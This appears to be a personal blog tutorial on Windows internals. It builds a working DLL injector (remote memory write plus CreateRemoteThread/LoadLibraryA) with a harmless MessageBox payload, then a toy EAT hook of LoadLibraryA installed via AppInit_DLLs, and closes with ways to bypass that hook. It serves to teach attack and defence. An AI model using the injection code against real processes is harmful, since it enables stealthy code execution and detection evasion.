Dll injection & userland EAT hooking

Introduction Link to heading

Our scenario Link to heading

In this post, my goal is to explore techniques used in malware development and anti virus softwares: DLL injections and API hooking. To do this, we are going to invent a scenario where we’ll play both the attacker and the defender. For our case study, we are going to assume that the program notepad.exe is a highly sensitive program. Our goal will be to first attack the program, and once our PoC is working, we will switch to the defense and try to mitigate our attack.

The attack will consist of a simple DLL injection, that just opens a basic MessageBox as a proof of concept, we will see later about the defense part, but as you guess it, we will play with API hooking.

Playing the attacker Link to heading

What is DLL injection ? Link to heading

DLL (Dynamic Link Library) are just a way for developers to share code between applications, it’s just a fancy name for compiled libraries. For example, if a process wants to open a message box on the screen of the user, it will need to call MessageBoxW, which is provided by the Windows API in the user32.dll file.

The core concept of DLL injection resides in the fact that loading a DLL is performed at runtime when requested by the process (the DLL is not compiled with the standalone executable). This allows the developer to have better control of memory management since the loaded DLL can be freed at any time, but it will allow us (attackers) to also inject our own custom DLL.

Once our DLL injection is successful, the DLL will be loaded into the process memory space, and will be executed in a newly created thread. The goal behind a DLL injection varies a lot, it can be:

Modifying the comportement of the process itself (game hacking for example)
Lateral movement (moving from a process to another)
Evading some kind of heuristic detection (It’s less suspicious if we download stuff from firefox.exe than from my_cool_malware.exe)

Note: We will only be talking about DLL injection here, but it is good to know that other DLL-related exploitation techniques exist, like DLL hijacking, hollowing etc…

Note 2: Obviously, you can not perform a DLL injection on a process you don’t have the permission to, you can’t just privesc like that.

The DLL Link to heading

As said in the introduction, our “malicious” payload is pretty straightforward, we are simply going to spawn a message box from the notepad process. Here’s the code we’re going to use:

#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReasonForCall, LPVOID lpReserved) {
	if (dwReasonForCall == DLL_PROCESS_ATTACH) {
		MessageBoxW(NULL, L"Hello from notepad!", L"Evil payload", MB_OK);
	}
}

Note: This is just to pop a message box, I’m not going to explain exactly all the keywords used (APIENTRY DllMain and stuff), so I’m just gonna do like the cool kids: It’s left as an exercise for the reader

The Injector Link to heading

Now for the real coding, our injector.

We are going to use the most simple way to inject a DLL, and the way most tutorials on the internet are doing it:

Getting access of the target process to interact with it
Inject the DLL path in the process memory
Call LoadLibraryA from the process space, with the DLL path as parameter

Note : There is many methods to inject a DLL into a process, but for simplicity we will use this one. It works well and is not over-complicated to understand

The first step, is to get access to the process we want to target

int main(int argc, const char* argv[]) {
	if (argc != 2) {
		printf("Usage: %s <target PID>", argv[0]);	
		return EXIT_FAILURE;
	}
	
	int PID = atoi(argv[1]); 
	
	printf("[*] - Getting handle for PID : %d...\n", PID);
	HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, PID);
	
	if (hProcess == NULL | hProcess == INVALID_HANDLE_VALUE) {
		printf("[!] - Fatal error: Can't get handle of process %d. (Is the PID valid ?).\nError code: %d\n", PID, GetLastError());
		return EXIT_FAILURE;
	}
	
	printf("[*] - Success\n");
}

To get access to the process and interact with it, we need to ask the windows API for a handle and some permissions. There’s a lot of permissions, for example PROCESS_ALL_ACCESS that gives everything, but here, we are only using 3 permissions.

We simply want to be able to write into the virtual memory (VM_OPERATION + VM_WRITE) and to create remote threads (CREATE_THREAD).

Once our handle retrieve, we are going to write the path of our DLL inside the process memory.

It may seem a bit odd, but we are doing this in order to have our parameter for LoadLibraryA (which will be the path to our evil DLL), and we are putting this argument in the process memory because we want to call LoadLibraryA from the target process.

const char* dllPath = "C:\\Path\\To\\Your\\dll\\dll_file.dll";
SIZE_T bytesWritten = 0;


LPVOID addressDllPath = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

WriteProcessMemory(hProcess, addressDllPath, dllPath, strlen(dllPath), &bytesWritten);
printf("[*] - Wrote %d bytes @ 0x%x", bytesWritten, (void*)addressDllPath);

Note: You can improve this snippet of code by adding checks to ensure that everything works

In order to be able to write to the memory without corrupting some potentially critical data in the target process, we are going to use VirtualAllocEx in order to allocate a new page of memory to make some room for the parameter.

If we look at the definition of VirtualAllocEx in the Microsoft documentation, we see the following parameters:

LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

One interesting thing I came across is the behaviour with dwSize. If we read the doc, and not just assume that it will allocate dwSize number of byte, we see that it’s not at all the expected behaviour:

If lpAddress is NULL, the function rounds dwSize up to the next page boundary.

This means, that when we are asking to allocate strlen(dllPath), the kernel will actually rounds this up to the next page size, usually 4Kb ( = 4000 characters !). So even if we put a 1 instead of strlen(dllPath), we would get the same exact allocation size. (There’s no conclusion on that or anything I just find it interesting)

And the WriteProcessMemory function is pretty self explanatory.

If we now run our program, we’ll see the address that our DLL path has been wrote:

PS C:\Users\gamray\Documents\Development\Test\Dll_injector> .\main.exe 7356
[*] - Getting handle for PID : 7356...
[*] - Success
[*] - Wrote 68 bytes @ 0x15920000

By attaching to notepad.exe with WinDBG, we can see that at the address there is indeed our payload:

The final step is now to create a remote thread calling LoadLibraryA with this path as parameter:

HANDLE hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA"), addressDllPath, 0, 0);

if (hThread == NULL || hThread == INVALID_HANDLE_VALUE) {
	printf("[!] - Fatal error: Can't create remote thread.\nError code: %d\n", GetLastError());
	return EXIT_FAILURE;
}

We use GetProcAddress to resolve the address of the function exported by kernel32 with the symbol “LoadLibraryA”. (we need to cast it as LPTHREAD_START_ROUTINE because… well Windows want’s it like that)

The last thing we can do is to clean up our mess, so the program won’t crash or have unexpected behavior.

For this, we simply need to close all of our handles:

CloseHandle(hThread);
CloseHandle(hProcess);
printf("[*] - Remote thread started, DLL injected successfully\n");

return EXIT_SUCCESS;

And… Our DLL injector is ready ! I’m not gonna paste the entire code here to keep the post clean, but you can find the entire source code here (it’s a bit cleaner)

The attack Link to heading

After running the attack, here’s what we got:

We successfully injected our (very) malicious DLL !

Playing the defender Link to heading

What is API hooking ? Link to heading

The term “hooking” refers to the act of intercepting/replacing functions calls and execute our custom code. Here, we will be hooking WINAPI functions. The goal here is to alter the default behavior of the API function in order to add a parameter validation to the function to “secure” the calls and prevent the DLL injection we just made previously.

Note: API hooking is not always used as a defensive mechanism, it can also be used in a malicious way, the best example being rootkits that can use API hooking to hide specific files when listing a directory.

In our scenario, we are going to hook the LoadLibraryA and perform checks on the parameters to only allow “verified” DLLs (we’ll just check if the filename is main.dll, the goal is just to make a technical demonstration, of course it’s supposed to be signature/heuristic based and stuff).

x86 vs x64 API hooking Link to heading

There are multiple ways to perform an API hooking. A well known technique is the “inline hooking”, used mostly in x86 systems.

The process is simple, we dynamically change the code of the target function, in order to jump to our custom hook when the function is called. Once our hook has been executed, we jump to a “trampoline”, that simply executes the stolen bytes of the original function before jumping back to it.

This whole technique resides in the fact that “jump to our custom hook” is made with a jmp instruction which is 5 bytes long, and that in most of 32 bits windows api functions, the 5 first bytes are usually the same:

mov edi, edi  
push ebp  
mov ebp, esp

Since this usually don’t change, it’s easy to just put those 3 instructions in a trampoline function and just execute them before jumping back to the original function.

However (!), in a x64 system, the prologue is not always the same first bytes, and the payload to jump to our hook function will be bigger because of the addresses being 8 bytes long. This obviously makes inline hooking really impractical to implement.

There’s two other techniques that exists, arguably better and more practical: IAT hooking and EAT hooking. They both work but we’ll use the EAT one for this proof of concept.

When a process loads a DLL in it’s memory, the Export Address Table of the DLL will be used to resolve all the addresses of the imported functions. The EAT will also be used when trying to resolve functions that have not been yet imported during runtime, for example when you do: GetProcAddress(dllModule, "functionName"), since "functionName" is not imported by the process, the EAT will handle the resolving of it’s address.

But what is IAT then ? Once the address of the function is resolved by the program using the EAT, it will be saved to the IAT in order to avoid recalculating it.

To resolve addresses, the EAT uses 3 lists:

A list of functions names (the ExportNameTable)
A list of “ordinal” (the ExportNameOrdinalTable) (think of it like indexes)
A list of offsets from the DLL base (the ExportTable)

If we want to get the address of the function “TestFunction”, we are going to search the string in the ExportNameTable. Once we have the index of the symbol in this table, we retrieve the ordinal at the same index in the ExportOrdinalTable, and then we use this ordinal as an index in the ExportTable to get the offset to the function. The complete address of the function will be: dllBase + ExportTable[ordinal].

Here’s a pseudo-code example of how it works:

ExportTable            = [0x200, 0x100, 0x500];
ExportNameTable        = ["func_A", "func_B", "func_C"];
ExportNameOrdinalTable = [1, 0, 2];

/*
"func_A" = ordinal 1, address @ Dll_base + ExportTable[1] = Dll_base + 0x100
"func_B" = ordinal 0, address @ Dll_base + ExportTable[0] = Dll_base + 0x200
"func_C" = ordinal 2, address @ Dll_base + ExportTable[2] = Dll_base + 0x500
*/

So we have a 3 step process:

1 - manually parse the EAT
2 - find the offset to LoadLibraryA
3 - patch it in order to points towards our custom function.

Here’s what we want to do (simplified) :

(before hooking)

(after hooking)

For all of this to work, we will need to patch the EAT of the program that will inject the evil DLL to the notepad. Since we can’t know beforehand which program will do what, we have to patch the EAT of every processes, to be sure that no one can inject this very malicious main.dll. And since we need to patch stuff inside other processes that means… That we are going to do DLL injection in order to prevent DLL injections 🤯.

You’ll see later how we are going to do such a thing while staying in userland and not doing any kernel related stuff. (spoiler: we are going to have to cheat a bit 😬)

Note: For the following part, it is recommend to have a little knowledge about the PE format, you can refer to this little documentation I made about the PE format in order to follow if you don’t understand some PE structures

1 - Parsing the EAT Link to heading

current process = The process our DLL is currently loaded in

victim process = The process we want to secure from dll injection (here should be notepad.exe)

Our EAT_hook.dll needs to patch the LoadLibraryA. To do this, we are going to patch the EAT of the kernel32.dll (where LoadLibraryA is exported) loaded in the current process memory.

Here’s some code:

uintptr_t baseAddressKernel32 = (uintptr_t)GetModuleHandle("kernel32");

// Creating the chain to retrieve the EAT from the base address
// dos header -> nt headers -> optionnal headers -> data directories -> directory entry export
PIMAGE_DOS_HEADER                dosHeaders = (PIMAGE_DOS_HEADER)baseAddressKernel32;
PIMAGE_NT_HEADERS64               ntHeaders = (PIMAGE_NT_HEADERS64)(baseAddressKernel32 + dosHeaders->e_lfanew);
IMAGE_DATA_DIRECTORY    exportDataDirectory = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

uintptr_t               exportDirectoryAddr = baseAddressKernel32 + exportDataDirectory.VirtualAddress;
PIMAGE_EXPORT_DIRECTORY     exportDirectory = (PIMAGE_EXPORT_DIRECTORY)exportDirectoryAddr;

printf("[i] - Base address @ 0x%llx", baseAddressKernel32);
printf("[i] - Export directory @ 0x%llx", exportDirectory);

DWORD* exportNameTable    = (DWORD*)(baseAddressKernel32 + exportDirectory->AddressOfNames);
DWORD* exportAddressTable = (DWORD*)(baseAddressKernel32 + exportDirectory->AddressOfFunctions);
WORD*  exportOrdinalTable = (WORD*)(baseAddressKernel32 + exportDirectory->AddressOfNameOrdinals);

printf("[i] - Export name table    @ 0x%llx", exportNameTable);
printf("[i] - Export address table @ 0x%llx", exportAddressTable);
printf("[i] - Export ordinal table @ 0x%llx", exportOrdinalTable);

(There’s not much important, we are just doing some PE headers stuff, I encourage you again to check some documentation if you’re more interested)

As you can see, we go through the PE headers of the module kernel32, we first retrieve the base address and the we make our way to the exportDirectoryAddr. Once we have it’s address, we can then get our 3 table we previously discussed:

exportNameTable
exportOrdinalTable
exportAddressTable

Now that we have our 3 table, we just have to loop through them and follow the rule of name->ordinal->address:

char*     currName = NULL;
WORD      currOrd  = 0;
uintptr_t currAddr = 0;

for (int i = 0; i < exportDirectory->NumberOfNames; i++) {
	currName = (char*)(baseAddressKernel32 + exportNameTable[i]);
	currOrd  = exportOrdinalTable[i];
	currAddr = (uintptr_t)(baseAddressKernel32 + exportAddressTable[currOrd]);

	printf("[i] export %d/%d: %s @ 0x%llx", i, exportDirectory->NumberOfNames, currName, currAddr);
}

And this gives us:

We can even manually check the address of LoadLibraryA:

That’s our next target 😎

2 - Find the address Link to heading

Welp, we just did that by hand, we now do it in C:

for (int i = 0; i < exportDirectory->NumberOfNames; i++) {
	currName = (char*)(baseAddressKernel32 + exportNameTable[i]);
	currOrd  = exportOrdinalTable[i];
	currAddr = (uintptr_t)(baseAddressKernel32 + exportAddressTable[currOrd]);

	if (strncmp(currName, "LoadLibraryA", 12) == 0) {
		printf("[i] export %d/%d: %s offset: ", i, exportDirectory->NumberOfNames, currName, exportAddressTable[currOrd]);
		break;
	}
}

LPVOID ptrToExportAddress = (LPVOID)&exportAddressTable[currOrd];

ptrToExportAddress is the pointer to the entry in the EAT, so we can overwrite it later.

And… that’s it. Yeah.

(We print the offset instead of the address because that’s what is in the exportAddressTable and it’s what we want to patch)

3 - Patch it… ? Link to heading

We create the hook function, that needs to have the same prototype as LoadLibraryA:

int __stdcall HookedLoadLibraryA(LPCSTR lpLibFileName) {
    const char* filename = strrchr(lpLibFileName, '\\');

	// military grade antivirus check:
    if (strcmp(filename, "\\main.dll") == 0) {
        MessageBoxA(NULL, "EVIL DLL DETECTED!!!", "EAT hooked", MB_ICONWARNING);
        return 1;
    }

    originalLoadLibraryA(lpLibFileName);
    return 0;
}

As you can see, we call originalLoadLibraryA if it’s a legit DLL. This is pretty important to make the API function still usable by legitimate programs. I’m not showing it here, but since we just parsed the EAT and retrieved the address of the original LoadLibraryA, I just made a pointer to this address in order to store it and be able to call it like this. (The full C source code will be link at the end of the post anyway)

So, now we just have to get the offset between kernel32 and HookedLoadLibraryA and put it in ptrToExportAddress, right ?

The problem is that exportAddressTable stores offset of type DWORD, or unsigned intwhich have a max size of 0xFFFFFFFF. And you guessed it, the offset between kernel32 and our custom function will pretty much always be further in memory (I learned the hard way…)

The solution to this is to ask Windows to allocate us a small chunk of memory the closest possible to kernel32 and to write to it a single jmp <address of our function>. We then will be able to make the EAT points to it, which will redirect any calls to our function.

So first we try to allocate 0x100 bytes the closest possible to the end of the kernel32 module:

DWORD moduleSize = ntHeaders->OptionalHeader.SizeOfImage;
size_t allocSize = 0x100;
LPVOID jumpAddress = NULL;
LPVOID targetAddress = (LPVOID)(baseAddressKernel32 + moduleSize);

while (jumpAddress == NULL) {
	jumpAddress = VirtualAlloc(targetAddress, allocSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	targetAddress += allocSize;
}

DWORD offsetJmp = (DWORD)(jumpAddress - baseAddressKernel32);
if (offsetJmp > (DWORD)0xffffff) {
	return EXIT_FAILURE;        
}

moduleSize is the size of kernel32 in memory.

We check if the offset between kernel32 and our newly allocated address is in range, and if it is, we write the jump payload to it:

// Writing our jump payload to the jump address
DWORD dwOldProtect = 0;
if (VirtualProtect(jumpAddress, sizeof(jumpPayload), PAGE_EXECUTE_READWRITE, &dwOldProtect) == FALSE) {
	return EXIT_FAILURE;
}

memcpy(jumpAddress, jumpPayload, sizeof(jumpPayload));
VirtualProtect(jumpAddress, sizeof(jumpPayload), dwOldProtect, &dwOldProtect);

It’s important to try to make the safest code possible, because if it crashes, the whole current process will crash, that’s why I make a lot of checks for failures.

And now we can finally overwrite the EAT entry !

We just have to overwrite ptrToExportAddress with offsetJmp we just calculated 🥳

if (VirtualProtect(ptrToExportAddress, sizeof(offsetJmp), PAGE_EXECUTE_READWRITE, &dwOldProtect) == FALSE) {
	return EXIT_FAILURE;
}

memcpy(ptrToExportAddress, &offsetJmp, sizeof(offsetJmp));
VirtualProtect(ptrToExportAddress, sizeof(offsetJmp), dwOldProtect, &dwOldProtect);

return EXIT_SUCCESS;

Yes, that’s right EXIT_SUCCESS 😎

Installing our EAT hook Link to heading

As we said in the beginning of the section, we need to inject our DLL in every new process. This is not supposed to be a big focus on this article so we wont use kernel drivers and stay in userland (also because I haven’t learned kernel driver yet 😅).

To do this, we will use an insane trick I learned in this incredible blog post from cocomelonc (go read his blog, it’s insane). We’ll use AppInit_Dlls.

The registry key AppInit_DLLs allows to inject a specified DLL in every new GUI process. GUI process here means any process that uses user32.dll. The problem is that our DLL injector we previously made is a console app and does not import user32.dll by default… So that’s why I said we are going to cheat a bit.

In order to make Windows inject our newly created antivirus DLL to the evil injector, we are going to edit it’s code and add a little MessageBoxA just before creating the remote thread:

DLL_injector.c

MessageBox(NULL, "Ready to inject", "Ready", MB_OK);

hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA"), addressDllPath, 0, 0);

Again, I do this trick to avoid having to do an entire kernel driver, it’s just to make the technical demonstration of EAT hooking :)

Here’s the code of cocomelonc modified a bit to fit our needs (it’s a install / uninstall exe for our “antivirus” DLL). In short, we just add the DLL to the registry key, and now every new GUI process will have EAT_hook.dll injected.

Replaying the attack Link to heading

We obviously install the hook before:

We can check it’s working correctly by opening a new notepad and checking the loaded modules inside the process:

And now, we just have to try again with our DLL injector…

And… it’s a success, the dll injector made notepad execute our own LoadLibraryA and can’t inject the evil dll ! 🥳

Conclusion Link to heading

So, obviously, this alone is not efficient at all in the real world: as an attacker point of view, there is so many ways to bypass this:

Simply using another function than LoadLibraryA, what about LoadLibraryEx?
Directly calling NTDLL functions
Resolving the address of LoadLibraryA by hand… Like we did
(Just rename the dll to something else than main.dll 👀)

So yeah, this was not about making our protection hard to bypass, but more a technical demonstration of the continuous cat-and-mouse game between the blue side and the red side at a relatively simple level compared to real attack tactics / security.

This project made me learned so much about windows internals, I made so many mistakes writing and thinking about the ways to make the hook works and every time I implemented something I learned how it worked and why it wasn’t working for my specific case.

I hope sharing this journey helps readers learning a thing or two in windows internal and malware development.

Credits / Other ressources Link to heading

If you want to chat about this, ask me about an unclear part or just a dumb mistake I made, please reach out to me on discord gamray or twitter @GammrayW.

All source code for the project:

Go read those blogs too:

crow dll_injection

inline api hooking orignal schema

ired.team iat_hooking